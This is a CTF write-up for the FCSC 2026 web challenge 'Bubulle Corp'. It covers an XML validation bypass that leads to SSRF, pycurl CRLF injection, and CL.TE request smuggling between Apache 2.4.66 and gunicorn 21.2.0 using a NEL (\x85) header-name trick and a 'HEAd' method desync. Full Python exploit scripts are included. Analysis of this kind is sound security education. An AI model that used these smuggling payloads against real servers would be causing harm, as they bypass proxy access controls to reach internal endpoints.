Bubulle Corp [EN] | FCSC 2026

April 11, 2026 - 13 mins read

Bubulle Corp 1 & 2 | FCSC 2026

Introduction

Bubulle Corp is a two-part web challenge from FCSC 2026. Both parts share the exact same source code: a three-service Docker setup with a Flask frontend, an Apache 2.4.66 reverse proxy, and a Flask/gunicorn 21.2.0 backend.

There are two flags hidden in the infra. The first one is kind of a decoy, just a plain flag.txt file sitting on the Apache proxy, served by an AliasMatch rule. Easy grab. The second one is the real deal: an environment variable FLAG on the backend, only reachable through GET /flag, an endpoint that Apache actively blocks from being proxied.

Getting that second flag requires chaining an XML parsing differential, a pycurl CRLF injection, and a CL.TE HTTP request smuggling desync that abuses a one-byte Unicode whitespace character difference between Apache and gunicorn.

Architecture

Three Docker containers, two isolated networks:

# docker-compose.yml
services:
  bubulle-corp-public-frontend:
    networks: [dmz]                 # Flask + pycurl, exposed on port 8000
  bubulle-corp-internal-proxy:
    networks: [dmz, internal]       # Apache 2.4.66, bridges both networks
  bubulle-corp-internal-backend:
    networks: [internal]            # gunicorn 21.2.0 + Flask, isolated

The frontend is on the dmz network and can’t resolve or reach the backend directly. The only way to reach the backend is through the Apache proxy, which sits on both networks.

The Apache config is short but there’s a lot going on:

# src/internal-proxy/apache.conf
HttpProtocolOptions Unsafe

AliasMatch "^/.+" "/flag.txt"

<Location "/">
    ProxyPass http://bubulle-corp-internal-backend:5000/ keepalive=Off disablereuse=On
    ProxyPassReverse http://bubulle-corp-internal-backend:5000/
</Location>

<LocationMatch "^/.+">
    ProxyPass "!"
    Require all granted
</LocationMatch>

HttpProtocolOptions Unsafe relaxes RFC 7230 request validation. In httpd-2.4.66/server/protocol.c at line 724, this sets strict = 0, which makes the request parser use ap_scan_vchar_obstext() instead of ap_scan_http_token(). Basically bytes in the obs-text range (0x80 to 0xFF) become legal in HTTP method names, header names, and header values. This is the entry point for Part 2.

The <Location "/"> block is a prefix match that applies to every URL starting with /, so everything. It sets up a reverse proxy to the backend. Then <LocationMatch "^/.+"> immediately overrides it: for any path with at least one character after the leading /, ProxyPass "!" cancels the proxy, and AliasMatch "^/.+" "/flag.txt" serves the local flag file instead. So only the exact path / gets forwarded to the backend. Everything else returns flag.txt.
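The net effect of these rules can be modeled in a few lines of Python. This is only a sketch of the outcome described above, not Apache's actual matching logic; the `route` helper and its return labels are hypothetical names chosen for illustration.

```python
import re

# Same pattern as the AliasMatch / LocationMatch directives in apache.conf.
NON_ROOT = re.compile(r"^/.+")

def route(path: str) -> str:
    """Hypothetical model of where a request path ends up."""
    if NON_ROOT.search(path):
        # ProxyPass "!" cancels proxying and AliasMatch maps the path to /flag.txt.
        return "flag.txt"
    # Only the bare "/" falls through to the ProxyPass in <Location "/">.
    return "backend"

for p in ("/", "/flag", "/anything/else"):
    print(p, "->", route(p))
```

Under this model, `/flag` never reaches the backend, which is why Part 2 needs a way to deliver `GET /flag` without Apache seeing it as a request path.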

The backend is straightforward:

# src/internal-backend/app.py
@app.route("/", methods=["POST", "GET"])
def index():
    return "Hello World!"

@app.route("/flag")
def flag():
    return environ.get("FLAG")

It runs under gunicorn with --worker-class gevent and --keep-alive 5.

Source Code Audit

Settings Validation (routes.py)

When a user updates their profile, the frontend parses XML and validates it in src/public-frontend/app/routes.py, starting at line 83:

for elem in list(root):
    if elem.tag == "icon_url" and (not elem.text or not elem.text.startswith("https://")):
        return render_template("settings.html", user=user, error="Icon URL must start with https://")
    if elem.tag == "method" and elem.text not in ("GET", "POST"):
        return render_template("settings.html", user=user, error="Method must be GET or POST")
    if elem.tag not in ("icon_url", "method", "body"):
        root.remove(elem)

The loop iterates over list(root), which only yields direct children of the <settings> root element. Anything nested deeper is invisible to the validation. Also the body tag is explicitly allowed and never inspected.

Icon Fetching (icon.py)

When GET /icon is called, the stored XML is re-parsed in src/public-frontend/app/icon.py:

icon_url = root.find(".//icon_url").text   # line 8
method   = root.find(".//method").text     # line 9
body     = root.find(".//body").text if root.find(".//body") else None  # line 10

Ok so this is where it gets interesting. The .find(".//tag") XPath searches every descendant of the root in document order (a depth-first traversal) and returns the first match. If a <method> element sits inside a <body> element that appears before the root-level <method>, the nested one is found first, because depth-first ordering visits an element's children before moving on to its next sibling. The values then go straight to pycurl:
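The scoping difference is easy to reproduce in isolation. The sketch below uses the standard library's xml.etree.ElementTree rather than lxml, on the assumption that both behave the same way for direct-child iteration and `.//tag` lookups; the hostnames are placeholders.

```python
import xml.etree.ElementTree as ET

doc = ET.fromstring(
    "<settings>"
    "<body><icon_url>http://nested.example/</icon_url></body>"
    "<icon_url>https://outer.example/</icon_url>"
    "<method>GET</method>"
    "</settings>"
)

# What the validator iterates over: direct children of the root only.
direct = [(child.tag, child.text) for child in list(doc)]

# What the consumer reads: the first match in document order, at any depth.
found = doc.find(".//icon_url").text

print(direct)
print(found)
```

The nested `<icon_url>` never shows up in `direct`, yet it is the value `find` returns, because `<body>` comes first in the document.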

c.setopt(pycurl.URL, icon_url.encode("latin1"))          # line 17
c.setopt(pycurl.CUSTOMREQUEST, method.encode("latin1"))   # line 18
# ...
if body:
    c.setopt(pycurl.POSTFIELDS, body.encode("latin1"))    # line 27

The latin1 encoding is byte-transparent: every Unicode codepoint from U+0000 to U+00FF maps to the byte of the same value. Characters like \x85 (NEL) or \r\n survive the encoding as their raw byte equivalents. This matters a lot for Part 2. The PROTOCOLS option restricts pycurl to HTTP and HTTPS only, so no gopher:// tricks.
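A quick check of that byte transparency, as a standalone sketch (the sample header string is just an illustration):

```python
# Every code point U+0000..U+00FF encodes to the single byte of the same value.
all_chars = "".join(chr(i) for i in range(256))
encoded = all_chars.encode("latin1")

# A header line containing NEL and CRLF keeps those bytes unchanged.
sample = "Transfer-Encoding\x85: chunked\r\n".encode("latin1")

# For contrast, UTF-8 would turn U+0085 into two bytes.
nel_utf8 = "\x85".encode("utf-8")

print(encoded == bytes(range(256)), sample, nel_utf8)
```

Had the frontend used UTF-8 here, the single `\x85` byte would not be reachable.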

Part 1 | XML Parsing Differential

Flag: FCSC{c22f014ba1aac9b3c487989156c470b0}

The Vulnerability

The validation in routes.py and the consumption in icon.py use fundamentally different scoping to locate the same XML elements. The validator checks only direct children of <settings>. The consumer searches all descendants depth-first. So by nesting a malicious <icon_url> inside <body>, I can bypass the https:// check while still having the nested value be the one pycurl actually uses.

The Payload

<settings>
  <body><icon_url>http://bubulle-corp-internal-proxy/flag</icon_url></body>
  <icon_url>https://vozec.fr</icon_url>
  <method>GET</method>
</settings>

When the validator runs, it iterates over three direct children: <body>, <icon_url>, and <method>. It checks the direct <icon_url> which has https://vozec.fr and passes. Checks <method> which is GET, also passes. <body> is allowed and ignored.

When icon.py runs, root.find(".//icon_url") traverses depth-first. It enters <body> first and finds the nested <icon_url>http://bubulle-corp-internal-proxy/flag</icon_url> before ever reaching the outer one. pycurl makes GET http://bubulle-corp-internal-proxy/flag, which hits the Apache proxy. Path is /flag, so the AliasMatch rule serves flag.txt and I get the first flag.

Solve Script

import requests

BASE = "https://bubulle-corp.fcsc.fr"
s = requests.Session()
s.post(f"{BASE}/register", data={"username": "testuser123", "password": "P@ssword1"})
s.post(f"{BASE}/login", data={"username": "testuser123", "password": "P@ssword1"})

xml = """<settings>
  <body><icon_url>http://bubulle-corp-internal-proxy/flag</icon_url></body>
  <icon_url>https://vozec.fr</icon_url>
  <method>GET</method>
</settings>"""
s.post(f"{BASE}/settings", data={"settings": xml})
r = s.get(f"{BASE}/icon")
print(r.text)

FCSC{c22f014ba1aac9b3c487989156c470b0}

Part 2 | CL.TE Request Smuggling

The Goal

The second flag lives in the FLAG environment variable on the backend, served at GET /flag. Apache’s config ensures only / reaches the backend. Any request to /flag gets intercepted by <LocationMatch "^/.+"> and served from flag.txt. I need to make gunicorn process GET /flag even though Apache only forwards GET /.

The answer is HTTP request smuggling. I send a single request to Apache that, from Apache’s perspective, has a body containing opaque data. But from gunicorn’s perspective, that “body” actually contains a second, smuggled HTTP request. When gunicorn finishes processing the first request, it finds GET /flag waiting in its read buffer and processes it too.

Vulnerability 1: pycurl CUSTOMREQUEST CRLF Injection

libcurl’s CURLOPT_CUSTOMREQUEST inserts the provided string verbatim into the HTTP request line with no CRLF filtering. If the string contains \r\n, those bytes appear raw on the wire, which lets me inject complete HTTP headers and even terminate the request to start a new one.

Combined with the XML bypass from Part 1, I control three parameters: the pycurl URL, the HTTP method string (with arbitrary CRLF injection), and the POST body via POSTFIELDS. Encoding is latin1, so every byte 0x00-0xFF is available.

Since the XML parser normalizes literal line endings (\r\n and a lone \r both become \n), I use XML character references to preserve them: &#xD; for CR, &#xA; for LF, and &#x85; for NEL. lxml resolves these to the actual Unicode codepoints, which then survive str.encode("latin1") as the raw bytes \x0D, \x0A, and \x85.
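The difference between literal control characters and character references can be checked with a short sketch. It uses the standard library's xml.etree.ElementTree as a stand-in for lxml, assuming both apply the usual XML line-ending normalization; the element content is made up.

```python
import xml.etree.ElementTree as ET

# A literal CRLF in element text is normalized to a single LF by the parser.
literal = ET.fromstring("<method>A\r\nB</method>").text

# Character references are resolved after that normalization, so they survive.
escaped = ET.fromstring("<method>A&#xD;&#xA;B&#x85;</method>").text

# latin1 then maps each code point to the byte of the same value.
wire = escaped.encode("latin1")

print(repr(literal), repr(escaped), wire)
```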

Vulnerability 2: CL.TE Desync via Transfer-Encoding\x85

This is the core of the smuggling, a parsing discrepancy between Apache and gunicorn on the Transfer-Encoding header.

Apache side. In httpd-2.4.66/modules/proxy/proxy_util.c at lines 4615-4617, Apache strips the Transfer-Encoding header by exact name lookup:

if ((*old_te_val = (char *)apr_table_get(r->headers_in, "Transfer-Encoding"))) {
    apr_table_unset(r->headers_in, "Transfer-Encoding");
}

apr_table_get does case-insensitive but otherwise exact string comparison. The header name Transfer-Encoding\x85 is a different string from Transfer-Encoding, so Apache doesn’t recognize it, doesn’t strip it, and forwards it untouched to the backend. Since Apache sees no Transfer-Encoding header, it falls back to Content-Length to determine the body size.

gunicorn side. In gunicorn-21.2.0/gunicorn/http/message.py at lines 88-96, the header name goes through name.upper() and then name.strip():

name = name.upper()
if HEADER_RE.search(name):
    raise InvalidHeaderName(name)
name, value = name.strip(), [value.lstrip()]

The HEADER_RE regex at line 24 is [\x00-\x1F\x7F()<>@,;:\[\]={} \t\\"]. The byte \x85 is not in this character class: the control range stops at \x1F and the only other control byte listed is \x7F, so the check passes. Then Python’s str.strip(), called with no arguments, removes leading and trailing Unicode whitespace, and U+0085 (NEL, Next Line) is classified as whitespace. So "TRANSFER-ENCODING\x85" becomes "TRANSFER-ENCODING" after stripping.
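The behaviour is easy to confirm outside gunicorn. The sketch below copies the regex quoted above and replays the upper / search / strip sequence; `normalize_header_name` is a hypothetical helper, not a gunicorn function.

```python
import re

# Character class as quoted from gunicorn 21.2.0's message.py.
HEADER_RE = re.compile(r'[\x00-\x1F\x7F()<>@,;:\[\]={} \t\\"]')

def normalize_header_name(raw: str) -> str:
    """Hypothetical helper replaying the three steps in order."""
    name = raw.upper()
    if HEADER_RE.search(name):
        raise ValueError(f"invalid header name: {name!r}")
    # str.strip() with no arguments removes Unicode whitespace, U+0085 included.
    return name.strip()

print("\x85".isspace())
print(normalize_header_name("Transfer-Encoding\x85"))
```

An ordinary trailing space would not work here, because the space character is in the rejected class; NEL slips through only because it is whitespace for `strip()` but not listed in the regex.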

At lines 134-139, gunicorn’s body reader finds this header and enables chunked framing:

elif name == "TRANSFER-ENCODING":
    if value.lower() == "chunked":
        chunked = True

if chunked:
    self.body = Body(ChunkedReader(self, self.unreader))

Desync complete: Apache reads the body using Content-Length (forwarding all N bytes), while gunicorn reads it as chunked (stopping at chunk 0\r\n\r\n and leaving the rest in its buffer as a new request).
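To make the two readings concrete, here is a minimal sketch that frames the same bytes both ways. The helpers are hypothetical and deliberately simplified (no chunk extensions, no trailers); they are not Apache's or gunicorn's parsers.

```python
smuggled = b"GET /flag HTTP/1.1\r\nHost: backend\r\n\r\n"
body = b"0\r\n\r\n" + smuggled

def content_length_view(data: bytes, length: int):
    """Proxy view: the body is exactly `length` bytes."""
    return data[:length], data[length:]

def chunked_view(data: bytes):
    """Backend view: read chunks until the zero-size chunk."""
    out, pos = b"", 0
    while True:
        eol = data.index(b"\r\n", pos)
        size = int(data[pos:eol], 16)
        pos = eol + 2
        if size == 0:
            # Skip the empty line that ends the chunked body (no trailers assumed).
            return out, data[pos + 2:]
        out += data[pos:pos + size]
        pos += size + 2  # chunk data plus its trailing CRLF

print(content_length_view(body, len(body)))
print(chunked_view(body))
```

With Content-Length framing nothing is left over, while chunked framing ends after five bytes and leaves the whole `GET /flag` request as the start of the next message.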

Vulnerability 3: Connection Keep-Alive Bypass

After gunicorn processes the first request (POST /), it needs to keep the TCP connection alive to process the smuggled GET /flag. But Apache’s terminate_headers() in httpd-2.4.66/modules/proxy/mod_proxy_http.c (lines 437-497) adds Connection: close to every proxied request because disablereuse=On makes ap_proxy_connection_reusable() return false.

Same \x85 trick works here. I inject Connection\x85: keep-alive in the request. Apache doesn’t recognize Connection\x85 as the Connection header, so it doesn’t strip it. It also appends its own Connection: close at the end.

gunicorn’s should_close() in gunicorn-21.2.0/gunicorn/http/message.py at lines 156-165 iterates headers in order and returns on the first CONNECTION match:

def should_close(self):
    for (h, v) in self.headers:
        if h == "CONNECTION":
            v = v.lower().strip()
            if v == "close":
                return True
            elif v == "keep-alive":
                return False
            break
    return self.version <= (1, 0)

Because my injected Connection\x85: keep-alive appears before Apache’s Connection: close in the header list, gunicorn strips the \x85, finds CONNECTION: keep-alive, returns False, and keeps the connection alive. The smuggled GET /flag gets processed as a second pipelined request.
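The ordering effect can be replayed with the should_close() logic quoted above, rewritten as a free function for the sake of the sketch. The header list is an assumed reconstruction of what the backend receives, with names normalized the way gunicorn does it (upper, then strip).

```python
def should_close(headers, version=(1, 1)):
    # Same decision logic as the gunicorn excerpt, without the class around it.
    for name, value in headers:
        if name == "CONNECTION":
            value = value.lower().strip()
            if value == "close":
                return True
            elif value == "keep-alive":
                return False
            break
    return version <= (1, 0)

# Injected header first, Apache's own header appended after it.
raw = [("Connection\x85", "keep-alive"), ("Connection", "close")]
parsed = [(name.upper().strip(), value) for name, value in raw]

print(parsed)
print(should_close(parsed))
```

If the order were reversed, the same function would return True, so the trick depends on the injected header reaching gunicorn ahead of Apache's.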

The disablereuse=On Challenge

With disablereuse=On, Apache unconditionally destroys the backend socket after reading the first response. In httpd-2.4.66/modules/proxy/proxy_util.c at lines 1636-1683, connection_cleanup() checks !worker->s->is_address_reusable and calls apr_pool_clear(p), which runs all registered cleanup callbacks including socket destruction:

if (!worker->s->is_address_reusable) {
    apr_pool_t *p = conn->pool;
    apr_pool_clear(p);
    conn = connection_make(p, worker);
}

So Apache reads gunicorn’s first response (Hello World!, CL=12), then closes the socket. The second response (the flag from GET /flag) is still in gunicorn’s TCP send buffer but gets discarded when the socket closes.

To read the flag response, I would need Apache to enter BODY_NONE mode (read-until-close), which happens in httpd-2.4.66/modules/http/http_filters.c at lines 362-444 when the backend response has neither Content-Length nor Transfer-Encoding. In that mode, Apache reads all data until the connection closes (the check at line 444 is skipped for PROXYREQ_RESPONSE), which would include the flag. But Flask always sets Content-Length on string responses, so gunicorn’s response always carries one, and Apache uses BODY_LENGTH mode, reading exactly that many bytes and ignoring the rest.

The first exploit below assumes disablereuse=Off (modified configuration), where Apache reuses the backend connection and the smuggled response can be read by a second proxied request hitting the same socket.

First exploit

import requests

BASE = "https://bubulle-corp.fcsc.fr"

def xml_enc(s):
    return (s
        .replace("&", "&amp;").replace("<", "&lt;").replace(">", "&gt;")
        .replace("\r\n", "&#xD;&#xA;")
        .replace("\r", "&#xD;").replace("\n", "&#xA;")
        .replace("\x85", "&#x85;")
    )

def ssrf(sess, method, body=None):
    bxml = xml_enc(body) if body else ""
    xml = (
        "<settings>"
            f"<body>{bxml}"
                f"<method>{xml_enc(method)}</method>"
                "<icon_url>http://bubulle-corp-internal-proxy/</icon_url>"
            "</body>"
            "<method>POST</method>"
            "<icon_url>https://x</icon_url>"
        "</settings>"
    )
    sess.post(f"{BASE}/settings", data={"settings": xml})
    return sess.get(f"{BASE}/icon").content

s = requests.Session()
s.post(f"{BASE}/register", data={"username": "vozec42", "password": "P@ssword1"})
s.post(f"{BASE}/login", data={"username": "vozec42", "password": "P@ssword1"})

method = (
    "POST / HTTP/1.1\r\n"
    "Host: bubulle-corp-internal-proxy\r\n"
    "Transfer-Encoding\x85: chunked\r\n"
    "Connection\x85: keep-alive\r\n"
    "Foo: "
)

body = (
    "0\r\n"
    "\r\n"
    "GET /flag HTTP/1.1\r\n"
    "Host: bubulle-corp-internal-backend:5000\r\n"
    "Connection: keep-alive\r\n"
    "\r\n"
)

r = ssrf(s, method, body)
print(r)

b'Hello World!'

The method string exploits the CRLF injection to craft a complete POST / request line with the smuggling headers. Foo: at the end absorbs pycurl’s auto-appended {path} HTTP/1.1\r\n into a harmless header value. The body string becomes the POSTFIELDS content, providing the CL.TE payload: a zero-length chunk terminator followed by the smuggled GET /flag request. Apache reads the body by Content-Length (all of it gets forwarded), while gunicorn reads only the chunk terminator and treats the rest as a new pipelined request.
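The role of the trailing Foo: header is easier to see by assembling the start of the request by hand. The sketch below is a simplified model that assumes libcurl writes the CUSTOMREQUEST value followed by a space, the path, and the protocol version; the headers libcurl adds on its own afterwards (Host, Content-Length, and so on) are left out, and `request_head` is a hypothetical helper.

```python
def request_head(custom_request: str, path: str = "/") -> bytes:
    """Simplified model of the first bytes written for a request."""
    return (custom_request + " " + path + " HTTP/1.1\r\n").encode("latin1")

method = (
    "POST / HTTP/1.1\r\n"
    "Host: bubulle-corp-internal-proxy\r\n"
    "Transfer-Encoding\x85: chunked\r\n"
    "Connection\x85: keep-alive\r\n"
    "Foo: "
)

lines = request_head(method).split(b"\r\n")
for line in lines:
    print(line)
```

In this model the real request line ends up as the value of `Foo`, so the server parses the injected `POST / HTTP/1.1` as the request line instead.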

The HEAd Case Trick

After a while I noticed something interesting in the Apache source while reading HttpProtocolOptions Unsafe more carefully. When Apache parses the request method, it determines whether the request is a HEAD by looking at the result of lookup_builtin_method(). This function, defined in httpd-2.4.66/modules/http/http_protocol.c at line 758, uses an optimized switch/case lookup that compares characters one by one, case-sensitively:

// http_protocol.c:789-796
case 4:
    switch (method[0])
    {
    case 'H':
        return (method[1] == 'E'
                && method[2] == 'A'
                && method[3] == 'D'          // case-sensitive
                ? M_GET : UNKNOWN_METHOD);

For HEAD (all uppercase), this returns M_GET. Then in protocol.c at lines 880-882:

// protocol.c:880-882
r->method_number = ap_method_number_of(r->method);
if (r->method_number == M_GET && r->method[0] == 'H')
    r->header_only = 1;

This sets r->header_only = 1, telling Apache the response has no body. Later in mod_proxy_http.c at line 1645, this flag determines whether Apache reads a body from the backend:

// mod_proxy_http.c:1645-1647
if ((!r->header_only) &&                   /* not HEAD request */
    (proxy_status != HTTP_NO_CONTENT) &&
    (proxy_status != HTTP_NOT_MODIFIED)) {

Here’s the key insight. If I send HEAd instead of HEAD (lowercase d), the lookup at http_protocol.c:795 compares method[3] against 'D'. Since 'd' != 'D', it returns UNKNOWN_METHOD. Back in protocol.c:880, r->method_number is M_INVALID, the condition r->method_number == M_GET is false, and r->header_only stays at 0. Apache doesn’t know this is a HEAD request. It expects a full response body.

With HttpProtocolOptions Unsafe and the default LenientMethods, Apache accepts unknown methods without error. It happily proxies HEAd / to the backend.
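The Apache side of this can be summarized with a small Python model of the two C excerpts above. It only covers the methods needed for the comparison and uses string labels in place of Apache's constants, so treat it as an illustration rather than a port.

```python
def lookup_builtin_method(method: str) -> str:
    """Model of the case-sensitive lookup; only GET and HEAD are covered."""
    if method == "GET":
        return "M_GET"
    if len(method) == 4 and method[0] == "H":
        # Character-by-character, case-sensitive comparison against "HEAD".
        return "M_GET" if method[1:] == "EAD" else "UNKNOWN_METHOD"
    return "UNKNOWN_METHOD"

def header_only(method: str) -> bool:
    """Model of the r->header_only decision in protocol.c."""
    return lookup_builtin_method(method) == "M_GET" and method[0] == "H"

for m in ("GET", "HEAD", "HEAd"):
    print(m, lookup_builtin_method(m), header_only(m))
```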

On the gunicorn side, the method validation in gunicorn-21.2.0/gunicorn/http/message.py at line 336 uses a regex that performs a prefix match:

# message.py:25
METH_RE = re.compile(r"[A-Z0-9$-_.]{3,20}")

# message.py:336-338
if not METH_RE.match(bits[0]):
    raise InvalidRequestMethod(bits[0])
self.method = bits[0].upper()

re.match() checks from the start of the string but doesn’t require consuming the full string. For "HEAd", it matches "HEA" (3 characters, satisfying {3,20}), so the check passes. Then bits[0].upper() converts "HEAd" to "HEAD". From this point on, gunicorn treats it as a standard HEAD request. Flask processes it as HEAD (returns headers but no body), and gunicorn’s is_chunked() at wsgi.py:286 returns False for HEAD, while should_close() at wsgi.py:217 also returns False (keeping the connection alive for the smuggled requests).
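The prefix-match behaviour can be checked directly with the regex quoted above. This sketch only exercises the pattern and the upper() call, not gunicorn itself.

```python
import re

# Pattern as quoted from gunicorn 21.2.0's message.py.
METH_RE = re.compile(r"[A-Z0-9$-_.]{3,20}")

token = "HEAd"
prefix = METH_RE.match(token)      # anchored at the start, not at the end
whole = METH_RE.fullmatch(token)   # would require the entire token to match
method = token.upper()

print(prefix.group(0), whole, method)
```

A token such as `GEt` would be rejected, since only two characters match before the lowercase letter and the pattern needs at least three.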

The result is a response desync: gunicorn sends a response with Content-Length but no body (because it thinks it’s HEAD), while Apache reads the response and expects Content-Length bytes of body (because it doesn’t think it’s HEAD). Apache reads those bytes from the next data on the connection, which is the smuggled GET /flag response.

Increasing Content-Length with Script_Name

Without Script_Name, the backend’s response for / is Hello World!, so its headers advertise Content-Length: 12. Apache would try to read 12 bytes of “body” from the connection, which covers only the first few bytes of the smuggled response’s HTTP status line. Not enough to capture the actual flag.

I use the Script_Name header to trigger a 308 redirect with a much larger body. In gunicorn-21.2.0/gunicorn/http/wsgi.py at lines 127-128 and 181-183:

# wsgi.py:127-128
elif hdr_name == "SCRIPT_NAME":
    script_name = hdr_value

# wsgi.py:181-183
path_info = req.path
if script_name:
    path_info = path_info.split(script_name, 1)[1]

When Script_Name is set to / and the request path is /, the split produces "/".split("/", 1)[1] which is "". Flask receives an empty PATH_INFO, interprets it as a missing trailing slash, and returns a 308 Permanent Redirect to /. The redirect response body is a standard HTML page of exactly 271 bytes, giving me Content-Length: 271 in the response headers. Since gunicorn believes this is HEAD, no body is sent. Apache, unaware it’s HEAD, reads 271 bytes from the connection and finds the smuggled GET /flag response.
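The split itself is plain string handling and can be checked on its own. `path_info` below is a hypothetical helper that mirrors the three quoted lines from wsgi.py.

```python
def path_info(path: str, script_name: str) -> str:
    """Mirror of the PATH_INFO computation quoted from wsgi.py."""
    if script_name:
        path = path.split(script_name, 1)[1]
    return path

print(repr(path_info("/", "/")))   # Script_Name: / on a request for /
print(repr(path_info("/", "")))    # no Script_Name header
```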

Filling the Buffer

The flag response from the backend includes HTTP headers and the flag body, totaling roughly 200 bytes. If I only smuggle a single GET /flag, Apache reads 200 bytes and then waits for the remaining 71 bytes, timing out. To avoid this, I smuggle multiple GET /flag requests. Their responses chain on the connection, and Apache reads through them until it has consumed 271 bytes. The flag appears within the first response, well inside the 271-byte window.
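The arithmetic behind that choice, as a small sketch. The 200-byte figure is the rough estimate from the paragraph above, not a measured value, so the exact count may differ; the final exploit repeats the smuggled request three times, which leaves some margin.

```python
import math

ADVERTISED_LENGTH = 271   # Content-Length of the 308 response
RESPONSE_SIZE = 200       # approximate size of one /flag response (assumption)

# Bytes Apache would still be waiting for after a single smuggled response.
shortfall = ADVERTISED_LENGTH - RESPONSE_SIZE

# Minimum number of smuggled responses needed to cover the advertised length.
needed = math.ceil(ADVERTISED_LENGTH / RESPONSE_SIZE)

print(shortfall, needed)
```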

Final Exploit

import requests

BASE = "https://bubulle-corp.fcsc.fr"

def xml_enc(s):
    return (s
        .replace("&", "&amp;").replace("<", "&lt;").replace(">", "&gt;")
        .replace("\r\n", "&#xD;&#xA;")
        .replace("\r", "&#xD;").replace("\n", "&#xA;")
        .replace("\x85", "&#x85;")
    )

def ssrf(sess, method, body=None):
    bxml = xml_enc(body) if body else ""
    xml = (
        "<settings>"
            f"<body>{bxml}"
                f"<method>{xml_enc(method)}</method>"
                "<icon_url>http://bubulle-corp-internal-proxy/</icon_url>"
            "</body>"
            "<method>POST</method>"
            "<icon_url>https://x</icon_url>"
        "</settings>"
    )
    sess.post(f"{BASE}/settings", data={"settings": xml})
    return sess.get(f"{BASE}/icon").content

s = requests.Session()
s.post(f"{BASE}/register", data={"username": "vozec42", "password": "P@ssword1"})
s.post(f"{BASE}/login", data={"username": "vozec42", "password": "P@ssword1"})

smuggled = (
    "GET /flag HTTP/1.1\r\n"
    "Host: bubulle-corp-internal-backend:5000\r\n"
    "\r\n"
)

method = (
    "HEAd / HTTP/1.1\r\n"
    "Host: bubulle-corp-internal-proxy\r\n"
    "Script_Name: /\r\n"
    "Transfer-Encoding\x85: chunked\r\n"
    "Connection\x85: keep-alive\r\n"
    "Foo: "
)

body = (
    "0\r\n"
    "\r\n"
    + smuggled * 3
)

r = ssrf(s, method, body)
print(r)

FCSC{7a17b107ecc0b7db613f9e202c026f5e}